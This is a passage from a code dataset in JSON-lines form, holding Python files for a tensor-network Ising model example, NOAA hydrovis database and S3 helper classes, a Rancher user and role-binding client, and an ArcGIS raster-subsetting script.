7), (7, 7), (7, 8), (8, 8), (8, 9)]\nres = []\n\nfor s in size:\n for _ in range(3):\n logger.info(\n 'Examining system of size ' +\n str(s) +\n ' and J = ' +\n str(J) +\n '.')\n start = time.clock()\n f = ising2DFreeEnergy(s[0], s[1], h, J, accuracy)\n end = time.clock()\n res.append((s[0] * s[1], f, end - start))\n\nres = np.array(res)\n\nprint(res)\n\nnp.savetxt('ising2D_disordered.dat', res)\n","repo_name":"adamjermyn/PyTNR","sub_path":"TNR/Examples/ising2DJ_loop_opt.py","file_name":"ising2DJ_loop_opt.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"23984608234","text":"import datetime\nimport boto3\nimport os\nimport json\nimport re\nimport urllib.parse\nimport inspect\nfrom botocore.exceptions import ClientError\n\n\nclass RequiredTableNotUpdated(Exception):\n \"\"\" This is a custom exception to report back to the AWS Step Function that a required table does not exist or has not yet been updated with the current reference time. \"\"\"\n\n###################################################################################################################################################\n###################################################################################################################################################\nclass database: #TODO: Should we be creating a connection/engine upon initialization, or within each method like we are now?\n def __init__(self, db_type):\n self.type = db_type.upper()\n self._engine = None\n self._connection = None\n \n @property\n def engine(self):\n if not self._engine:\n self._engine = self.get_db_engine()\n return self._engine\n\n @property\n def connection(self):\n if not self._connection:\n self._connection = self.get_db_connection()\n return self._connection\n \n ###################################\n def get_db_credentials(self):\n db_host = os.environ[f'{self.type}_DB_HOST']\n db_name = os.environ[f'{self.type}_DB_DATABASE']\n db_user = os.environ[f'{self.type}_DB_USERNAME']\n db_password = os.getenv(f'{self.type}_DB_PASSWORD')\n return db_host, db_name, db_user, db_password\n\n ###################################\n def get_db_engine(self):\n from sqlalchemy import create_engine\n db_host, db_name, db_user, db_password = self.get_db_credentials()\n db_engine = create_engine(f'postgresql://{db_user}:{db_password}@{db_host}/{db_name}')\n print(f\"***> Established db engine to: {db_host} from {inspect.stack()[1].function}()\")\n return db_engine\n\n ###################################\n def get_db_connection(self, asynchronous=False):\n import psycopg2\n db_host, db_name, db_user, db_password = self.get_db_credentials()\n port = 5439 if self.type == \"REDSHIFT\" else 5432\n connection = psycopg2.connect(f\"host={db_host} dbname={db_name} user={db_user} password={db_password} port={port}\", async_=asynchronous)\n print(f\"***> Established db connection to: {db_host} from {inspect.stack()[1].function}()\")\n return connection\n\n ###################################\n def get_db_values(self, table, columns):\n import pandas as pd\n db_engine = self.engine\n if not type(columns) == list:\n raise Exception(\"columns argument must be a list of column names\")\n columns = \",\".join(columns)\n print(f\"---> Retrieving values for {columns}\")\n df = pd.read_sql(f'SELECT {columns} FROM {table}', db_engine)\n db_engine.dispose()\n return df\n \n ###################################\n def load_df_into_db(self, table_name, df, drop_first=True):\n import pandas as pd\n schema = table_name.split(\".\")[0]\n table = table_name.split(\".\")[-1]\n db_engine = self.engine\n if drop_first:\n print(f\"---> Dropping {table_name} if it exists\")\n db_engine.execute(f'DROP TABLE IF EXISTS {table_name};') # Drop the stage table if it exists\n print(\"---> Getting sql to create table\")\n create_table_statement = pd.io.sql.get_schema(df, table_name)\n replace_values = {'\"geom\" TEXT': '\"geom\" GEOMETRY', \"REAL\": \"DOUBLE PRECISION\"} # Correct data types\n for a, b in replace_values.items():\n create_table_statement = create_table_statement.replace(a, b)\n create_table_statement = 
create_table_statement.replace(f'\"{table_name}\"', table_name)\n print(f\"---> Creating {table_name}\")\n db_engine.execute(create_table_statement) # Create the new empty stage table\n print(f\"---> Adding data to {table_name}\")\n df.to_sql(con=db_engine, schema=schema, name=table, index=False, if_exists='append')\n db_engine.dispose()\n\n ###################################\n def run_sql_file_in_db(self, sql_file):\n sql = open(sql_file, 'r').read()\n with self.connection as db_connection:\n try:\n cur = db_connection.cursor()\n print(f\"---> Running {sql_file}\")\n cur.execute(sql)\n db_connection.commit()\n except Exception as e:\n raise e\n \n ################################### \n def run_sql_in_db(self, sql, return_geodataframe=False):\n if sql.endswith(\".sql\"):\n sql = open(sql, 'r').read()\n \n db_engine = self.engine\n if not return_geodataframe:\n import pandas as pd\n df = pd.read_sql(sql, db_engine)\n else:\n import geopandas as gdp\n df = gdp.GeoDataFrame.from_postgis(sql, db_engine)\n \n db_engine.dispose()\n return df\n\n ###################################\n def get_est_row_count_in_table(self, table):\n print(f\"Getting estimated total rows in {table}.\")\n with self.connection as db_connection:\n try:\n cur = db_connection.cursor()\n sql = f\"\"\"\n SELECT (CASE WHEN c.reltuples < 0 THEN NULL -- never vacuumed\n WHEN c.relpages = 0 THEN float8 '0' -- empty table\n ELSE c.reltuples / c.relpages END\n * (pg_catalog.pg_relation_size(c.oid) / pg_catalog.current_setting('block_size')::int))::bigint\n FROM pg_catalog.pg_class c\n WHERE c.oid = '{table}'::regclass; -- schema-qualified table here\n \"\"\"\n cur.execute(sql)\n rows = cur.fetchone()[0]\n except Exception as e:\n raise e\n return rows\n \n ###################################\n def move_data_to_another_db(self, dest_db_type, origin_table, dest_table, stage=True, add_oid=True, add_geom_index=True, chunk_size=200000):\n import pandas as pd\n origin_engine = self.engine\n dest_db = self.__class__(dest_db_type)\n dest_engine = dest_db.get_db_engine()\n if stage:\n dest_final_table = dest_table\n dest_final_table_name = dest_final_table.split(\".\")[1]\n dest_table = f\"{dest_table}_stage\"\n total_rows = self.get_est_row_count_in_table(origin_table) + 50000 #adding 50000 for buffer since this is estimated\n print(f\"---> Reading {origin_table} from the {self.type} db\")\n dest_engine.execute(f'DROP TABLE IF EXISTS {dest_table};') # Drop the destination table if it exists\n \n # Chunk the copy into multiple parts if necessary\n for x in range(0, total_rows, chunk_size):\n print(f\"Copying Chunk: LIMIT {chunk_size} OFFSET {x}\")\n df = pd.read_sql(f'SELECT * FROM {origin_table} LIMIT {chunk_size} OFFSET {x};', origin_engine) # Read from the newly created table\n drop_first = True if x == 0 else False\n dest_db.load_df_into_db(dest_table, df, drop_first=drop_first)\n \n if add_oid:\n print(f\"---> Adding an OID to the {dest_table}\")\n dest_engine.execute(f'ALTER TABLE {dest_table} ADD COLUMN OID SERIAL PRIMARY KEY;')\n if add_geom_index:\n print(f\"---> Adding an spatial index to the {dest_table}\")\n dest_engine.execute(f'CREATE INDEX ON {dest_table} USING GIST (geom);') # Add a spatial index\n if stage:\n print(f\"---> Renaming {dest_table} to {dest_final_table}\")\n dest_engine.execute(f'DROP TABLE IF EXISTS {dest_final_table};') # Drop the published table if it exists\n dest_engine.execute(f'ALTER TABLE {dest_table} RENAME TO {dest_final_table_name};') # Rename the staged table\n origin_engine.dispose()\n 
dest_engine.dispose()\n \n ###################################\n def cache_data(self, table, reference_time, retention_days=30):\n retention_cutoff = reference_time - datetime.timedelta(retention_days)\n ref_prefix = f\"ref_{reference_time.strftime('%Y%m%d_%H%M_')}\"\n retention_prefix = f\"ref_{retention_cutoff.strftime('%Y%m%d_%H%M_')}\"\n new_archive_table = f\"archive.{ref_prefix}{table}\"\n cutoff_archive_table = f\"archive.{retention_prefix}{table}\"\n db_engine = self.engine\n db_engine.execute(f'DROP TABLE IF EXISTS {new_archive_table};')\n db_engine.execute(f'DROP TABLE IF EXISTS {cutoff_archive_table};')\n db_engine.execute(f'SELECT * INTO {new_archive_table} FROM publish.{table};')\n db_engine.dispose()\n print(f\"---> Wrote cache data into {new_archive_table} and dropped corresponding table from {retention_days} days ago, if it existed.\")\n \n ###########################################\n def check_required_tables_updated(self, sql_path_or_str, sql_replace={}, reference_time=None, stop_on_first_issue=True, raise_if_false=False):\n \"\"\" Determines if tables required by provided SQL path or string are updated as expected\n\n Args:\n sql_path_or_str (str): Path to SQL file or raw SQL string\n sql_replace (dict): Dictionary containing find/replace values for SQL, if applicable\n reference_time (str): The reference_time that should be compared against for tables that contain a\n reference_time column. If the table does not contain that column, it is\n considered to be up to date\n stop_on_first_issue (bool): If True, the first issue encountered will cause the script to terminate\n either returning false or raising an exception if raise_if_false is also True. If False, every\n error will be explored before returning (only useful if raise_if_false is True since the error\n message will thus contain all relevant failures, rather than just the first.)\n raise_if_false (bool): If True, a custom RequiredTableNotUpdated exception will be raised\n if either a table does not exist, or if the reference_time column\n exists its current value does not match the provided reference_time. The specific\n details of the failure will be included in the exception message, which will only\n be the first failure encountered unless stop_on_first_issue is False.\n \n Raises:\n RequiredTableNotUpdated if raise_if_false is True\n \n Returns:\n Bool. True if no issues encountered, False otherwise.\n \"\"\"\n issues_encountered = []\n # Determine if arg is file or raw SQL string\n if os.path.exists(sql_path_or_str):\n sql = open(sql_path_or_str, 'r').read()\n else:\n sql = sql_path_or_str\n \n for word, replacement in sql_replace.items():\n sql = re.sub(word, replacement, sql, flags=re.IGNORECASE).replace('utc', 'UTC')\n \n output_tables = set(re.findall('(?<=INTO )\\w+\\.\\w+', sql, flags=re.IGNORECASE)) \n input_tables = set(re.findall('(?<=FROM |JOIN )\\w+\\.\\w+', sql, flags=re.IGNORECASE))\n check_tables = [t for t in input_tables if t not in output_tables]\n\n if not check_tables:\n return True\n \n # This next 3 lines were added specifically to abort checking cache.max_flows_ana when creating \n # cache.max_flows_ana_past_hour since cache.max_flow_ana will always be an hour behind at the \n # time of creating the past_hour table. Rather than hard-code it exactly, I've left it more generalized \n # in case other similar cases come up. 
But this could ideally be removed once We figure out a \n # new method for storing the past hour of max_flows_ana.\n if any('past' in t for t in output_tables):\n return True\n\n # Required tables exist and should be checked\n with self.connection as connection:\n cur = connection.cursor()\n for table in check_tables:\n if issues_encountered and stop_on_first_issue:\n break\n schemaname, tablename = table.lower().split('.')\n sql = f'''\n SELECT EXISTS (\n SELECT FROM \n information_schema.tables\n WHERE \n table_schema = '{schemaname}' AND \n table_name = '{tablename}'\n );\n '''\n cur.execute(sql)\n table_exists = cur.fetchone()[0]\n\n if not table_exists:\n issues_encountered.append(f'Table {table} does not exist.')\n continue\n \n # Table exists.\n\n if not reference_time or any(x in table for x in ['past', 'ahps']):\n continue\n \n # Reference time provided.\n \n # Check if reference_time column exists and if its entry matches\n sql = f'''\n SELECT EXISTS (\n SELECT 1 \n FROM information_schema.columns \n WHERE table_schema='{schemaname}' AND table_name='{tablename}' AND column_name='reference_time'\n );\n '''\n cur.execute(sql)\n reftime_col_exists = cur.fetchone()[0]\n if not reftime_col_exists:\n continue\n \n # Column 'reference_time' exists\n \n # Check if it matches\n sql = f\"SELECT reference_time FROM {table} LIMIT 1\"\n cur.execute(sql)\n reftime_result = cur.fetchone()\n if not reftime_result: # table is empty\n issues_encountered.append(f'Table {table} is empty.')\n continue\n \n data_reftime = reftime_result[0].replace(\" UTC\", \"\")\n if data_reftime != reference_time: # table reference time matches current reference time\n issues_encountered.append(f'Table {table} has unexpected reftime. Expected {reference_time} but found {data_reftime}.')\n continue\n \n if issues_encountered:\n if raise_if_false:\n raise RequiredTableNotUpdated(' '.join(issues_encountered))\n return False\n return True\n\n###################################################################################################################################################\n###################################################################################################################################################\nclass s3_file:\n def __init__(self, bucket, key):\n self.bucket = bucket\n self.key = key\n self.uri = 's3://' + bucket + '/' + key\n\n ###################################\n @classmethod\n def from_lambda_event(cls, event):\n print(\"Parsing lambda event to get S3 key and bucket.\")\n if \"Records\" in event:\n message = json.loads(event[\"Records\"][0]['Sns']['Message'])\n data_bucket = message[\"Records\"][0]['s3']['bucket']['name']\n data_key = urllib.parse.unquote_plus(message[\"Records\"][0]['s3']['object']['key'], encoding='utf-8')\n else:\n data_bucket = event['data_bucket']\n data_key = event['data_key']\n return cls(data_bucket, data_key)\n\n ###################################\n @classmethod\n def from_eventbridge(cls, event):\n configuration = event['resources'][0].split(\"/\")[-1]\n eventbridge_time = datetime.datetime.strptime(event['time'], '%Y-%m-%dT%H:%M:%SZ')\n\n coastal = False\n if \"coastal\" in configuration:\n coastal = True\n \n forcing = False\n if \"forcing\" in configuration:\n forcing = True\n\n if \"hawaii\" in configuration:\n domain = \"hawaii\"\n elif \"puertorico\" in configuration:\n domain = \"puertorico\"\n elif \"alaska\" in configuration:\n domain = \"alaska\"\n else:\n domain = \"conus\"\n\n if \"analysis_assim\" in configuration:\n if \"14day\" in 
configuration:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0, hour=0)\n            elif coastal and domain in [\"conus\", \"puertorico\"]:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=1)\n            else:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0)\n        elif \"short_range\" in configuration:\n            if domain in [\"hawaii\", \"puertorico\"]:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=3)\n            elif domain == \"alaska\":\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=1)\n            elif coastal:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=2)\n            else:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=1)\n        elif \"medium_range\" in configuration:\n            if forcing:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=5)\n            elif domain == \"alaska\":\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=6)\n            elif coastal:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=13)\n            else:\n                reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=7)\n\n        bucket = os.environ.get(\"DATA_BUCKET_UPLOAD\") if os.environ.get(\"DATA_BUCKET_UPLOAD\") else \"nomads\"\n\n        reference_time = reference_time - datetime.timedelta(hours=1)\n        \n        return configuration, reference_time, bucket\n\n    ###################################\n    @classmethod\n    def get_most_recent_from_configuration(cls, configuration_name, bucket):\n        s3 = boto3.client('s3')\n        # Set the S3 prefix based on the configuration\n        def get_s3_prefix(configuration_name, date):\n            if configuration_name == 'replace_route':\n                prefix = f\"replace_route/{date}/wrf_hydro/\"\n            elif configuration_name == 'ahps':\n                prefix = f\"max_stage/ahps/{date}/\"\n            else:\n                nwm_dataflow_version = os.environ.get(\"NWM_DATAFLOW_VERSION\") if os.environ.get(\"NWM_DATAFLOW_VERSION\") else \"prod\"\n                if configuration_name == 'medium_range_ensemble':\n                    configuration_name = 'medium_range_mem6'\n                prefix = f\"common/data/model/com/nwm/{nwm_dataflow_version}/nwm.{date}/{configuration_name}/\"\n            \n            return prefix\n        \n        # Get all S3 files that match the bucket / prefix\n        def list_s3_files(bucket, prefix):\n            files = []\n            paginator = s3.get_paginator('list_objects_v2')\n            for result in paginator.paginate(Bucket=bucket, Prefix=prefix):\n                for key in result['Contents']:\n                    # Skip folders\n                    if not key['Key'].endswith('/'):\n                        files.append(key['Key'])\n            if len(files) == 0:\n                raise Exception(\"No Files Found.\")\n            return files\n        # Start with looking at files today, but try yesterday if that doesn't work (in case this runs close to midnight)\n        today = datetime.datetime.today().strftime('%Y%m%d')\n        yesterday = (datetime.datetime.today() - datetime.timedelta(1)).strftime('%Y%m%d')\n        try:\n            files = list_s3_files(bucket, get_s3_prefix(configuration_name, today))\n        except Exception as e:\n            print(f\"Failed to get files for today ({e}). 
Trying again with yesterday's files\")\n files = list_s3_files(bucket, get_s3_prefix(configuration_name, yesterday))\n # It seems this list is always sorted by default, but adding some sorting logic here may be necessary\n file = cls(bucket=bucket, key=files[-1:].pop())\n return file\n\n ###################################\n def check_existence(self):\n s3_resource = boto3.resource('s3')\n try:\n s3_resource.Object(self.bucket, self.key).load()\n return True\n except ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n else:\n raise\n\n###################################################################################################################################################\n###################################################################################################################################################\ndef get_elasticsearch_logger():\n import logging\n logger = logging.getLogger('elasticsearch')\n logger.setLevel(logging.INFO)\n if not logger.handlers:\n # Prevent logging from propagating to the root logger\n logger.propagate = 0\n console = logging.StreamHandler()\n logger.addHandler(console)\n formatter = logging.Formatter('[ELASTICSEARCH %(levelname)s]: %(asctime)s - %(message)s')\n console.setFormatter(formatter)\n return logger","repo_name":"NOAA-OWP/hydrovis","sub_path":"Core/LAMBDA/layers/viz_lambda_shared_funcs/python/viz_classes.py","file_name":"viz_classes.py","file_ext":"py","file_size_in_byte":21992,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
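A hypothetical usage sketch for the database helper above; 'VIZ' is a made-up db_type, so matching VIZ_DB_HOST, VIZ_DB_DATABASE, VIZ_DB_USERNAME and VIZ_DB_PASSWORD environment variables are assumed to be set:

db = database('VIZ')
ok = db.check_required_tables_updated(
    'SELECT * FROM publish.some_table;',   # raw SQL string, not a file path
    reference_time='2023-01-01 00:00:00',
    raise_if_false=False)                  # return False instead of raising
print('required tables updated:', ok)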
+{"seq_id":"5939383547","text":"from beedrones.rancher.client import RancherObject, RancherError\nfrom beecell.simple import truncate\n\n\nclass RancherUser(RancherObject):\n \"\"\"RancherUser\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n\n self.global_role_bind = RancherUserGlobalRoleBinding(manager)\n self.cluster_role_bind = RancherUserClusterRoleBinding(manager)\n self.project_role_bind = RancherUserProjectRoleBinding(manager)\n\n def list(self, **filters):\n \"\"\"List users\n\n :param filters: custom filters\n :return: list of users\n \"\"\"\n # filters['limit'] = filters.get('limit', 0)\n res = self.http_list('/users', **filters)\n self.logger.debug('list users: %s' % truncate(res))\n return res\n\n def get(self, user_id):\n \"\"\"Get user info\n\n :param user_id: user id\n :return: user info\n \"\"\"\n res = self.http_get('/users/%s' % user_id)\n self.logger.debug('get user: %s' % truncate(res))\n return res\n\n def add(self, name, pwd, enabled=True, change_pwd=False, **kwargs):\n \"\"\"Create user\n\n :param name: user name\n :param pwd: user password\n :param enabled: user enabled [default=True]\n :param change_pwd: user change_pwd [default=False]\n :param kwargs: custom user params\n :param kwargs.description: user params\n :return: user id\n \"\"\"\n data = {\n 'type': 'user',\n 'enabled': enabled,\n 'mustChangePassword': change_pwd,\n 'name': name,\n 'username': name,\n 'password': pwd\n }\n data.update(self.format_request_data(kwargs, []))\n res = self.http_post('/users', **data)\n self.logger.debug('add user: %s' % res.get('id'))\n return res\n\n def delete(self, user_id):\n \"\"\"Delete user\n\n :param user_id: user id\n :return: True\n \"\"\"\n self.http_delete('/users/%s' % user_id)\n self.logger.debug('delete user: %s' % user_id)\n return True\n\n def generate_kubeconfig(self, user_id, cluster_id):\n \"\"\"generate user kubeconfig\n\n :param cluster_id: cluster id\n :param user_id: user id\n :return: True\n \"\"\"\n self.base_uri = '/v3/clusters/%s?action=generateKubeconfig' % cluster_id\n res = self.http_post('').get('config', '')\n self.logger.debug('generate user %s kubeconfig for cluster %s: %s' % (user_id, cluster_id, res))\n return res\n\n def get_roles(self, user_id):\n \"\"\"get user roles\n\n :param user_id: user id\n :return: user roles\n \"\"\"\n roles = []\n\n # global role bindings\n role_bindings = self.global_role_bind.list(user_id=user_id)\n for rb in role_bindings:\n role = self.manager.role_global.get(rb.get('globalRoleName'))\n role['role_bind_id'] = rb['id']\n roles.append(role)\n\n # cluster role bindings\n role_bindings = self.cluster_role_bind.list(user_id=user_id)\n for rb in role_bindings:\n role = self.manager.role_template.get(rb.get('roleTemplateName'))\n role['role_bind_id'] = rb['id']\n role['context:entity'] = rb.get('clusterName', None)\n roles.append(role)\n\n # project role bindings\n role_bindings = self.project_role_bind.list(user_id=user_id)\n for rb in role_bindings:\n role = self.manager.role_template.get(rb.get('roleTemplateName'))\n role['context:entity'] = rb.get('projectName', None)\n roles.append(role)\n return roles\n\n def get_role_binds(self, role_type='global'):\n \"\"\"get user role binds\n\n :param role_type: role type. 
Can be global, cluster, project or all\n        :return: user roles\n        \"\"\"\n        res = []\n\n        if role_type == 'all' or role_type == 'global':\n            # global role bindings\n            role_bindings = self.global_role_bind.list()\n            for rb in role_bindings:\n                rb['role'] = self.manager.role_global.get(rb.get('globalRoleName'))\n            res.extend(role_bindings)\n\n        if role_type == 'all' or role_type == 'cluster':\n            # cluster role bindings\n            role_bindings = self.cluster_role_bind.list()\n            for rb in role_bindings:\n                rb['role'] = self.manager.role_template.get(rb.get('roleTemplateName'))\n            res.extend(role_bindings)\n\n        if role_type == 'all' or role_type == 'project':\n            # project role bindings\n            role_bindings = self.project_role_bind.list()\n            for rb in role_bindings:\n                rb['role'] = self.manager.role_template.get(rb.get('roleTemplateName'))\n            res.extend(role_bindings)\n\n        self.logger.debug('get users role bindings: %s' % truncate(res))\n        return res\n\n    def get_role_bind(self, user_id, role_id, role_type='global', cluster_id=None):\n        \"\"\"get user role bind\n\n        :param user_id: user id\n        :param role_id: role id\n        :param role_type: role type. Can be global, cluster, project\n        :return: user roles\n        \"\"\"\n        res = None\n\n        if role_type == 'global':\n            # global role bindings\n            role_bindings = [rb['id'] for rb in self.global_role_bind.list()\n                             if rb.get('globalRoleName') == role_id and\n                             rb.get('userName') == user_id]\n            if 0 < len(role_bindings) < 2:\n                res = role_bindings[0]\n\n        elif role_type == 'cluster':\n            # cluster role bindings\n            role_bindings = [rb['id'] for rb in self.cluster_role_bind.list()\n                             if rb.get('roleTemplateName') == role_id and\n                             rb.get('userName') == user_id and\n                             rb.get('clusterName') == cluster_id]\n            if 0 < len(role_bindings) < 2:\n                res = role_bindings[0]\n\n        elif role_type == 'project':\n            # project role bindings\n            role_bindings = [rb['id'] for rb in self.project_role_bind.list()\n                             if rb.get('roleTemplateName') == role_id and\n                             rb.get('userName') == user_id]\n            if 0 < len(role_bindings) < 2:\n                res = role_bindings[0]\n        self.logger.debug('get user %s role %s binding: %s' % (user_id, role_id, truncate(res)))\n        return res\n\n\nclass RancherUserGlobalRoleBinding(RancherObject):\n    \"\"\"RancherUserGlobalRoleBinding\n    \"\"\"\n    def __init__(self, manager):\n        super().__init__(manager)\n        self.base_uri = '/v1/management.cattle.io.globalrolebindings'\n\n    def list(self, user_id=None, **kwargs):\n        \"\"\"Get global role bindings by user\n\n        :param user_id: user id\n        :return:\n        \"\"\"\n        # params = ['user_id']\n        # data = self.format_paginated_query(kwargs, params, aliases={'user_name': 'userName'})\n        data = ''\n        res = self.http_get('?').get('data')\n        if user_id is not None:\n            res = [r for r in res if r.get('userName') == user_id]\n        self.logger.debug('get global role binding: %s' % (truncate(res)))\n        return res\n\n    def add(self, user_id, role):\n        \"\"\"assign global role to user\n\n        :param user_id: user id\n        :param role: global role id\n        :return:\n        \"\"\"\n        data = {\n            'type': 'globalRoleBinding',\n            'globalRoleId': role,\n            'userId': user_id\n        }\n        self.base_uri = '/v3/globalrolebindings'\n        res = self.http_post('', **data)\n        self.logger.debug('assign global role %s to user %s' % (role, user_id))\n        return res\n\n    def delete(self, role_id):\n        \"\"\"deassign a global role binding\n\n        :param role_id: role id\n        :return:\n        \"\"\"\n        self.base_uri = '/v3/globalrolebindings'\n        res = self.http_delete('/%s' % role_id)\n        self.logger.debug('deassign global role %s' % role_id)\n        return res\n\n\nclass RancherUserClusterRoleBinding(RancherObject):\n    
\"\"\"RancherUserClusterRoleBinding\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n self.base_uri = '/v1/management.cattle.io.clusterroletemplatebindings'\n\n def list(self, user_id=None, **kwargs):\n \"\"\"Get cluster role bindings by user\n\n :param user_id: user id\n :return:\n \"\"\"\n res = self.http_get('?').get('data')\n if user_id is not None:\n res = [r for r in res if r.get('userName') == user_id]\n self.logger.debug('get user %s cluster role binding: %s' % (user_id, truncate(res)))\n return res\n\n def add(self, user_id, role_id, cluster_id, user_type='local'):\n \"\"\"assign cluster role to user\n\n :param user_id: user id\n :param role_id: cluster role id\n :param user_type: user type [default=local]\n :return:\n \"\"\"\n data = {\n 'type': 'clusterRoleTemplateBinding',\n 'clusterId': cluster_id,\n 'roleTemplateId': role_id,\n 'userPrincipalId': '%s://%s' % (user_type, user_id)\n }\n self.base_uri = '/v3/clusterroletemplatebindings'\n res = self.http_post('', **data)\n self.logger.debug('assign cluster %s role %s to user %s' % (cluster_id, role_id, user_id))\n return res\n\n def delete(self, role_id):\n \"\"\"deassign a cluster role binding\n\n :param role_id: role id\n :return:\n \"\"\"\n role_id = role_id.replace('/', ':')\n self.base_uri = '/v3/clusterroletemplatebindings'\n res = self.http_delete('/%s' % role_id)\n self.logger.debug('deassign cluster role %s' % role_id)\n return res\n\n\nclass RancherUserProjectRoleBinding(RancherObject):\n \"\"\"RancherUserProjectRoleBinding\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n self.base_uri = '/v1/management.cattle.io.projectroletemplatebindings'\n\n def list(self, user_id=None, **kwargs):\n \"\"\"Get cluster role bindings by user\n\n :param user_id: user id\n :return:\n \"\"\"\n res = self.http_get('?').get('data')\n if user_id is not None:\n res = [r for r in res if r.get('userName') == user_id]\n self.logger.debug('get user %s project role binding: %s' % (user_id, truncate(res)))\n return res\n\n def add(self, user_id, role_id, project_id, user_type='local'):\n \"\"\"assign project role to user\n\n :param user_id: user id\n :param role_id: project role id\n :param user_type: user type [default=local]\n :return:\n \"\"\"\n data = {\n 'type': 'projectRoleTemplateBinding',\n 'projectId': project_id,\n 'roleTemplateId': role_id,\n 'userPrincipalId': '%s://%s' % (user_type, user_id)\n }\n self.base_uri = '/v3/projectroletemplatebindings'\n res = self.http_post('', **data)\n self.logger.debug('assign project %s role %s to user %s' % (project_id, role_id, user_id))\n return res\n\n def delete(self, role_id):\n \"\"\"deassign a project role binding\n\n :param role_id: role id\n :return:\n \"\"\"\n role_id = role_id.replace('/', ':')\n self.base_uri = '/v3/projectroletemplatebindings'\n res = self.http_delete('/%s' % role_id)\n self.logger.debug('deassign project role %s' % role_id)\n return res\n","repo_name":"Nivola/beedrones","sub_path":"beedrones/rancher/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":11411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18210493643","text":"from arcpy.management import Clip as ClipRaster\n\n\ndef subset_image(in_raster, area, out_raster):\n from arcpy import Describe\n from math import sqrt\n desc = Describe(in_raster)\n XMin = desc.extent.XMin\n YMin = desc.extent.YMin\n len = sqrt(area)\n clipping_extent = '{0} {1} {2} {3}'.format(XMin, YMin, XMin+len, YMin+len)\n ClipRaster(in_raster, clipping_extent, out_raster, \"#\", \"#\", \"NONE\")\n\n\ndef image_extent_2(in_polygon):\n from arcpy import Describe\n desc = Describe(in_polygon)\n return '{0} {1} {2} {3}'.format(desc.extent.XMin, desc.extent.YMin, desc.extent.XMax, desc.extent.YMax)\n\n\ndef subset_image_for_texture(in_image, in_polygon, area, out_raster):\n from os import path\n from arcpy import Describe, AddWarning\n from arcpy.management import Delete\n from math import sqrt\n temp_rast = path.join(\"in_memory\", \"temp_rast\")\n ClipRaster(in_image, image_extent_2(in_polygon), temp_rast, \"#\", \"#\", \"NONE\")\n desc = Describe(temp_rast).children[0]\n height = desc.height\n width = desc.width\n cell_height = desc.meancell_height\n cell_width = desc.meancell_width\n r_length = height*cell_height\n r_width = width*cell_width\n if r_length > sqrt(area) and r_width > sqrt(area):\n subset_image(temp_rast, area, out_raster)\n else:\n AddWarning(\"Geometry Length and Width do not fit Area| Length = {0} | Width = {1}\".format(r_length, r_width))\n AddWarning(\"Draw a larger area where length and width fit within the area as a square\")\n Delete(temp_rast)\n\n\ndef main():\n from arcpy import CheckExtension, CheckOutExtension, CheckInExtension, ExecuteError, GetMessages\n\n class LicenseError(Exception):\n pass\n\n try:\n if CheckExtension(\"ImageAnalyst\") == \"Available\":\n CheckOutExtension(\"ImageAnalyst\")\n else:\n # raise a custom exception\n raise LicenseError\n subset_image_for_texture(in_image, in_polygon, area, out_image)\n CheckInExtension(\"ImageAnalyst\")\n except LicenseError:\n print(\"Image Analyst license is unavailable\")\n except ExecuteError:\n print(GetMessages(2))\n\n\nif __name__ == \"__main__\":\n debug = False\n if debug:\n in_image = r'C:\\Users\\geof7015\\Documents\\ArcGIS\\Projects\\ArcGIS_Image_Designer\\TestData\\imgFolder\\Ortho.jpg'\n in_polygon = r'C:\\Users\\geof7015\\Documents\\ArcGIS\\Projects\\ArcGIS_Image_Designer\\ArcGIS_Image_Designer.gdb\\subset_polygon'\n area = 400\n out_image = r'C:\\Users\\geof7015\\Documents\\ArcGIS\\Projects\\ArcGIS_Image_Designer\\Textures\\Unprocessed\\test.jpg'\n else:\n from arcpy import GetParameterAsText, GetParameter\n in_image = GetParameterAsText(0)\n in_polygon = GetParameterAsText(1)\n area = GetParameter(2)\n out_image = GetParameterAsText(3)\n main()\n","repo_name":"geoffhtaylor3d/ArcGIS_Image_Designer","sub_path":"Scripts/subset_image_for_texture.py","file_name":"subset_image_for_texture.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
